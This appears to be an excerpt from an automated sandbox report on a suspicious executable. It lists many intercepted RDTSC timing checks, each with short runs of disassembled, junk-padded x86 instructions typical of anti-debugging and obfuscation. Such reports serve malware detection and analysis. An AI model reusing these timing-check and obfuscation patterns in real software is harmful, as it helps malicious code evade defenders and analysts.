                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F86E41 second address: F86E61 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F5AD8CCD671h 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f pop eax 0x00000010 popad 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F86E61 second address: F86E67 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F86E67 second address: F86E71 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F86E71 second address: F86E79 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F896CE second address: F896D8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 js 00007F5AD8CCD666h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F896D8 second address: F896DC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F896DC second address: E01BFE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 add dword ptr [esp], 5B529A18h 0x0000000f movsx ecx, cx 0x00000012 push dword ptr [ebp+122D00B9h] 0x00000018 xor cx, A046h 0x0000001d call dword ptr [ebp+122D178Ch] 0x00000023 pushad 0x00000024 jmp 00007F5AD8CCD66Dh 0x00000029 xor eax, eax 0x0000002b pushad 0x0000002c sbb di, CCF1h 0x00000031 cmc 0x00000032 popad 0x00000033 mov edx, dword ptr [esp+28h] 0x00000037 pushad 0x00000038 push ecx 0x00000039 pop edx 0x0000003a mov dword ptr [ebp+122D32C7h], edx 0x00000040 popad 0x00000041 mov dword ptr [ebp+122D3890h], eax 0x00000047 mov dword ptr [ebp+122D32C7h], esi 0x0000004d jns 00007F5AD8CCD66Ch 0x00000053 add dword ptr [ebp+122D2466h], eax 0x00000059 mov esi, 0000003Ch 0x0000005e jbe 00007F5AD8CCD672h 0x00000064 jnl 00007F5AD8CCD66Ch 0x0000006a jne 00007F5AD8CCD666h 0x00000070 add esi, dword ptr [esp+24h] 0x00000074 mov dword ptr [ebp+122D32C7h], edi 0x0000007a lodsw 0x0000007c cmc 0x0000007d add eax, dword ptr [esp+24h] 0x00000081 cmc 0x00000082 mov ebx, dword ptr [esp+24h] 0x00000086 stc 0x00000087 mov dword ptr [ebp+122D2466h], edx 0x0000008d push eax 0x0000008e pushad 0x0000008f push eax 0x00000090 push edx 0x00000091 jmp 00007F5AD8CCD677h 0x00000096 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F8971B second address: F897AC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 push eax 0x00000008 jno 00007F5AD8CCF449h 0x0000000e nop 0x0000000f or dword ptr [ebp+122D1AA1h], edi 0x00000015 and ecx, dword ptr [ebp+122D1AA1h] 0x0000001b push 00000000h 0x0000001d push 00000000h 0x0000001f push ebx 0x00000020 call 00007F5AD8CCF438h 0x00000025 pop ebx 0x00000026 mov dword ptr [esp+04h], ebx 0x0000002a add dword ptr [esp+04h], 00000015h 0x00000032 inc ebx 0x00000033 push ebx 0x00000034 ret 0x00000035 pop ebx 0x00000036 ret 0x00000037 pushad 0x00000038 jnc 00007F5AD8CCF43Ch 0x0000003e push ebx 0x0000003f mov ecx, 45FD6C9Dh 0x00000044 pop ebx 0x00000045 popad 0x00000046 mov edi, dword ptr [ebp+122D37B4h] 0x0000004c call 00007F5AD8CCF439h 0x00000051 pushad 0x00000052 jmp 00007F5AD8CCF447h 0x00000057 push eax 0x00000058 push edx 0x00000059 je 00007F5AD8CCF436h 0x0000005f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F897AC second address: F897C0 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F5AD8CCD666h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push ecx 0x0000000f pop ecx 0x00000010 pop eax 0x00000011 push esi 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F897C0 second address: F89844 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 popad 0x00000006 mov eax, dword ptr [esp+04h] 0x0000000a jmp 00007F5AD8CCF444h 0x0000000f mov eax, dword ptr [eax] 0x00000011 jl 00007F5AD8CCF43Ah 0x00000017 push ecx 0x00000018 pushad 0x00000019 popad 0x0000001a pop ecx 0x0000001b mov dword ptr [esp+04h], eax 0x0000001f jmp 00007F5AD8CCF445h 0x00000024 pop eax 0x00000025 jmp 00007F5AD8CCF442h 0x0000002a mov edx, dword ptr [ebp+122D3ACCh] 0x00000030 push 00000003h 0x00000032 mov dword ptr [ebp+122D1F7Ah], eax 0x00000038 push 00000000h 0x0000003a sub ch, FFFFFFD2h 0x0000003d push 00000003h 0x0000003f pushad 0x00000040 mov eax, 424C95B8h 0x00000045 popad 0x00000046 push AAF4A1C0h 0x0000004b pushad 0x0000004c jnl 00007F5AD8CCF438h 0x00000052 push eax 0x00000053 push edx 0x00000054 pushad 0x00000055 popad 0x00000056 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F89844 second address: F89887 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F5AD8CCD666h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b xor dword ptr [esp], 6AF4A1C0h 0x00000012 or dl, FFFFFF99h 0x00000015 lea ebx, dword ptr [ebp+1245B628h] 0x0000001b push 00000000h 0x0000001d push eax 0x0000001e call 00007F5AD8CCD668h 0x00000023 pop eax 0x00000024 mov dword ptr [esp+04h], eax 0x00000028 add dword ptr [esp+04h], 00000014h 0x00000030 inc eax 0x00000031 push eax 0x00000032 ret 0x00000033 pop eax 0x00000034 ret 0x00000035 cld 0x00000036 push eax 0x00000037 je 00007F5AD8CCD683h 0x0000003d push eax 0x0000003e push edx 0x0000003f push esi 0x00000040 pop esi 0x00000041 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F89916 second address: F89924 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F5AD8CCF436h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d pop eax 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F89924 second address: F899C0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5AD8CCD678h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a add dword ptr [esp], 387C1E5Bh 0x00000011 push 00000000h 0x00000013 push edi 0x00000014 call 00007F5AD8CCD668h 0x00000019 pop edi 0x0000001a mov dword ptr [esp+04h], edi 0x0000001e add dword ptr [esp+04h], 00000018h 0x00000026 inc edi 0x00000027 push edi 0x00000028 ret 0x00000029 pop edi 0x0000002a ret 0x0000002b mov dh, 30h 0x0000002d push 00000003h 0x0000002f mov cx, si 0x00000032 push 00000000h 0x00000034 pushad 0x00000035 cmc 0x00000036 mov ecx, dword ptr [ebp+122D3828h] 0x0000003c popad 0x0000003d push 00000003h 0x0000003f push 00000000h 0x00000041 push edi 0x00000042 call 00007F5AD8CCD668h 0x00000047 pop edi 0x00000048 mov dword ptr [esp+04h], edi 0x0000004c add dword ptr [esp+04h], 00000015h 0x00000054 inc edi 0x00000055 push edi 0x00000056 ret 0x00000057 pop edi 0x00000058 ret 0x00000059 xor edi, 59D5F062h 0x0000005f push F5C6E363h 0x00000064 pushad 0x00000065 push eax 0x00000066 push edx 0x00000067 jmp 00007F5AD8CCD679h 0x0000006c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F899C0 second address: F899C4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F899C4 second address: F89A28 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 jmp 00007F5AD8CCD66Dh 0x0000000c pop esi 0x0000000d popad 0x0000000e xor dword ptr [esp], 35C6E363h 0x00000015 pushad 0x00000016 mov ebx, 440CA315h 0x0000001b pushad 0x0000001c mov dx, 1018h 0x00000020 mov esi, dword ptr [ebp+122D3667h] 0x00000026 popad 0x00000027 popad 0x00000028 lea ebx, dword ptr [ebp+1245B631h] 0x0000002e add dword ptr [ebp+122D1F54h], eax 0x00000034 xchg eax, ebx 0x00000035 jnl 00007F5AD8CCD67Dh 0x0000003b push eax 0x0000003c push edi 0x0000003d push eax 0x0000003e push edx 0x0000003f je 00007F5AD8CCD666h 0x00000045 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FA93AD second address: FA93B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FA93B3 second address: FA93C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F5AD8CCD66Ch 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FA951F second address: FA9523 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FA9523 second address: FA952C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FA952C second address: FA953C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 popad 0x0000000a pushad 0x0000000b pushad 0x0000000c push eax 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FA983B second address: FA9841 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FA999D second address: FA99A7 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F5AD8CCF436h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FA9EC6 second address: FA9ECA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FA9ECA second address: FA9ED0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FA9ED0 second address: FA9ED4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FAA1A3 second address: FAA1D0 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F5AD8CCF43Eh 0x00000008 pushad 0x00000009 pushad 0x0000000a popad 0x0000000b jmp 00007F5AD8CCF441h 0x00000010 pushad 0x00000011 popad 0x00000012 popad 0x00000013 pop edx 0x00000014 pop eax 0x00000015 pushad 0x00000016 push eax 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FAA1D0 second address: FAA1D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FAA1D8 second address: FAA1DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FAA1DE second address: FAA1F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push esi 0x00000006 jc 00007F5AD8CCD666h 0x0000000c je 00007F5AD8CCD666h 0x00000012 pop esi 0x00000013 push eax 0x00000014 push edx 0x00000015 push edx 0x00000016 pop edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FAA362 second address: FAA37E instructions: 0x00000000 rdtsc 0x00000002 jo 00007F5AD8CCF436h 0x00000008 jmp 00007F5AD8CCF442h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FAA37E second address: FAA385 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F823A6 second address: F823DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F5AD8CCF43Ch 0x0000000b popad 0x0000000c push ecx 0x0000000d jmp 00007F5AD8CCF449h 0x00000012 pushad 0x00000013 popad 0x00000014 pop ecx 0x00000015 pushad 0x00000016 jg 00007F5AD8CCF436h 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FAAD98 second address: FAADE0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5AD8CCD676h 0x00000007 jmp 00007F5AD8CCD66Bh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e jnp 00007F5AD8CCD66Eh 0x00000014 jl 00007F5AD8CCD666h 0x0000001a push edx 0x0000001b pop edx 0x0000001c push eax 0x0000001d push edx 0x0000001e jmp 00007F5AD8CCD671h 0x00000023 pushad 0x00000024 popad 0x00000025 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FAADE0 second address: FAAE04 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jg 00007F5AD8CCF436h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 jmp 00007F5AD8CCF43Bh 0x00000015 pushad 0x00000016 popad 0x00000017 je 00007F5AD8CCF436h 0x0000001d popad 0x0000001e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FAAE04 second address: FAAE0E instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pushad 0x00000004 popad 0x00000005 pop esi 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FAAE0E second address: FAAE12 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FAAFA8 second address: FAAFAD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F6C9FE second address: F6CA04 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F6CA04 second address: F6CA0C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FAFE98 second address: FAFEB4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5AD8CCF448h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FB11E8 second address: FB11ED instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FB23FD second address: FB2401 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FB2401 second address: FB241C instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F5AD8CCD671h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FB241C second address: FB2426 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F5AD8CCF436h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FB647F second address: FB6493 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push ebx 0x00000006 jmp 00007F5AD8CCD66Ch 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FB68D7 second address: FB68DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FB68DD second address: FB68E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FB6B84 second address: FB6BAA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5AD8CCF442h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push edx 0x0000000a jmp 00007F5AD8CCF43Eh 0x0000000f pop edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FB6BAA second address: FB6BD0 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007F5AD8CCD675h 0x0000000a pop edx 0x0000000b pop edx 0x0000000c pop eax 0x0000000d pushad 0x0000000e jo 00007F5AD8CCD66Ch 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FBAC9D second address: FBACA1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FBACA1 second address: FBACAB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FBACAB second address: FBACCB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp], ebx 0x0000000a jl 00007F5AD8CCF43Bh 0x00000010 mov esi, 6CC2C3FAh 0x00000015 nop 0x00000016 push ebx 0x00000017 pushad 0x00000018 jns 00007F5AD8CCF436h 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FBB2B4 second address: FBB2BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FBB2BA second address: FBB2BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FBB2BF second address: FBB2C5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FBB82F second address: FBB839 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 pushad 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FBD269 second address: FBD283 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5AD8CCD66Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push esi 0x0000000e push ecx 0x0000000f pop ecx 0x00000010 pop esi 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FBD283 second address: FBD2C8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F5AD8CCF43Eh 0x00000008 jmp 00007F5AD8CCF43Ah 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 nop 0x00000011 pushad 0x00000012 add dword ptr [ebp+1245B750h], eax 0x00000018 popad 0x00000019 mov si, A6C4h 0x0000001d push 00000000h 0x0000001f sbb esi, 144697FCh 0x00000025 push 00000000h 0x00000027 mov si, di 0x0000002a movsx esi, bx 0x0000002d xchg eax, ebx 0x0000002e push ecx 0x0000002f jns 00007F5AD8CCF43Ch 0x00000035 push eax 0x00000036 push edx 0x00000037 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FBD2C8 second address: FBD2F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 pushad 0x00000007 jmp 00007F5AD8CCD66Bh 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F5AD8CCD674h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FBDDE3 second address: FBDDE7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FBDB9C second address: FBDBA0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FBDBA0 second address: FBDBAA instructions: 0x00000000 rdtsc 0x00000002 jno 00007F5AD8CCF436h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FBDBAA second address: FBDBB0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FBDBB0 second address: FBDBB4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FBDBB4 second address: FBDBB8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FBF3CA second address: FBF44C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5AD8CCF440h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push 00000000h 0x0000000c push esi 0x0000000d call 00007F5AD8CCF438h 0x00000012 pop esi 0x00000013 mov dword ptr [esp+04h], esi 0x00000017 add dword ptr [esp+04h], 00000014h 0x0000001f inc esi 0x00000020 push esi 0x00000021 ret 0x00000022 pop esi 0x00000023 ret 0x00000024 push 00000000h 0x00000026 push 00000000h 0x00000028 push ecx 0x00000029 call 00007F5AD8CCF438h 0x0000002e pop ecx 0x0000002f mov dword ptr [esp+04h], ecx 0x00000033 add dword ptr [esp+04h], 00000019h 0x0000003b inc ecx 0x0000003c push ecx 0x0000003d ret 0x0000003e pop ecx 0x0000003f ret 0x00000040 mov edi, 0E3B48F2h 0x00000045 sub dword ptr [ebp+122D2DC5h], ebx 0x0000004b push 00000000h 0x0000004d or esi, 14A59150h 0x00000053 xchg eax, ebx 0x00000054 jmp 00007F5AD8CCF440h 0x00000059 push eax 0x0000005a push edi 0x0000005b push eax 0x0000005c push edx 0x0000005d jp 00007F5AD8CCF436h 0x00000063 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FC080A second address: FC080F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FC44BE second address: FC44C8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jng 00007F5AD8CCF436h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FC44C8 second address: FC44CC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FC499F second address: FC49C0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5AD8CCF43Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jl 00007F5AD8CCF43Ch 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FC4A66 second address: FC4A84 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F5AD8CCD66Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F5AD8CCD66Bh 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FC5A0D second address: FC5A17 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F5AD8CCF436h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FC69FC second address: FC6A00 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FC6A00 second address: FC6A06 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FC6A06 second address: FC6A2F instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jmp 00007F5AD8CCD676h 0x00000008 pop edx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d jno 00007F5AD8CCD668h 0x00000013 push ebx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
